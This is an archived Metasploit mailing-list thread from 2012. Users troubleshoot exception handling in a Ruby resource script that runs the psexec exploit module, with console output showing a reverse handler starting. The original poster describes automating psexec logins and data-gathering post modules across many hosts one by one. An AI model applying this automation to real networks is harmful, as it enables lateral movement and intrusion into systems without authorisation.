Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Catching exploit exceptions in rc script

From: Joshua Smith <lazydj98 () gmail com>
Date: Tue, 26 Jun 2012 12:54:03 -0500
birchfresh and I were direct emailing, thought I would send this to the list:  
this works:

<ruby>
        run_single("use exploit/windows/smb/psexec")
        run_single("set RHOST 1.1.1.1") # <-- this host doesn't exist
        begin
                run_single("exploit -j")
        rescue
        end
</ruby>

[*] resource (/msf/test.rc)> Ruby Code (126 bytes)
RHOST => 1.1.1.1
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.100.101:4444 
[*] Connecting to the server...

<a while later>
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (1.1.1.1:445).
URule exploit(psexec) > jobs

Jobs
====

No active jobs.

URule exploit(psexec) >

Something else to keep in mind, inside a ruby block (in an rc file) you're in a weird place in the framework 
(Msf::Ui::Console::Driver)
cat test.rc
<ruby>
        puts self.class
</ruby>
resource test.rc
[*] Processing /msf/test.rc for ERB directives.
[*] resource (/msf/test.rc)> Ruby Code (17 bytes)
Msf::Ui::Console::Driver

-kernelsmith

On Jun 26, 2012, at 10:46 AM, birchfresh wrote:


Hello there.

I'm using msfconsole (newest git) to run a rc script that's essentially
something like:

 <ruby>
 run_single("use windows/smb/psexec")
 # [...]

 old_sessions = framework.sessions.keys.clone
 run_single("exploit -z") rescue nil    # script stops here after exception!

 new_session = (old_sessions - framework.sessions.keys).first
 do_something_with(new_session) if new_session
 </ruby>

My problem is that if the exploit raises an exception, the script refuses
continue until I press ^C. Shouldn't "rescue nil" catch the exception?

I tried to work around it by running the exploit as a background job
(exploit -z -j) and waiting for framework.jobs.length to be decremented,
but it's no good: If there's an exception, the job hangs around forever.

For context, I'm doing the following to a number of hosts, one by one:
Pivoted login with the psexec module, run a post module to gather some
data, kill the session, move on to the next host.

Is there a better way to open a session (and get its number) than to
run_single("exploit -z") and poke around in framework.sessions.keys for
newcomers?

Or, as a last resort: Is there a way to tell if the exploit at
framework.jobs[id] is dead?
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: